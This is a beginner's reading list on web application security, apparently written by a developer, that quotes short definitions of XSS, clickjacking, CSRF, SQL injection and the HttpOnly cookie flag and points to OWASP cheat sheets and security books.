This is a small list of vulnerabilities, links and books which help to junior developers with learning security. The knowledge came to me bit by bit. Accidentally I knew about "OWASP" after seven months of my work. I knew about the "ranbow table" when I was reading the "Learning NodeJs". More programmes don't know about the "HttpOnly" flag although they have more than year of experience of development. Why is this happening? This is not an article. I won't to explain your about "race condition" or other a specific vulnerability or something else... The goal of this list that you will see links and books which you can read. I want to save your time. Do you know what does "vulnerability scanner" mean? No? So you can read about it here. Now you hear about "vulnerability scanner", you read about "vulnerability scanner" and may be you will use it in the future. This is awesome! My goal was achieved!
The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization > focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.
See OWASP: TOP 10, 2013 and list of all vulnerabilites on the OWASP web site.
Critical bug allowing execute code on the server occurs in one third of applications, but simple thing such as XSS are almost always.
-- Egor Homakov
Articles about XSS:
- XssAttacks
- OWASP: XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
- SecurityHeaders: X-XSS-Protection
Servers should not rely on client-side validation. Client-side validation can be intentionally bypassed by hostile users, and unintentionally bypassed by users of older user agents or automated tools that do not implement these features. The constraint validation features are only intended to improve the user experience, not to provide any kind of security mechanism.
Because don't forget about backend validation!
Clickjacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
-- OWASP: CSRF
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
- Wiki
- Learning NodeJS (you can read in this book the chapter "Guards at the Gate"(subchapter "Safely Storing Passwords"))
- OWASP: PHP_security_cheatsheet
- OWASP: Ruby_on_Rails_cheatsheet
- RailsGuides: Ruby_on_Rails_security_guide
- The Tangled Web
- The web application Hacker's handbook
- PHP and MySQL Web Development (you can read in this book the chapter "E-commerce Security issue")